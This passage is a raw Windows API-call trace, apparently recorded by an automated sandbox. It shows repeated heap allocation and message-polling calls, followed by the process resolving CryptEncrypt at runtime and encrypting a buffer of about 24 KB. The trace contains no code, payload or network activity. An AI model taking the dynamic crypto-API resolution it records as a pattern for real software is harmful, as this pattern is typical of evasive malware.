returned 1 [0165.755] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.755] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0165.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.756] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.756] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.757] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.757] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.757] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e3548 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.762] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0165.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.763] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x5d6d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x5d70) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0165.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 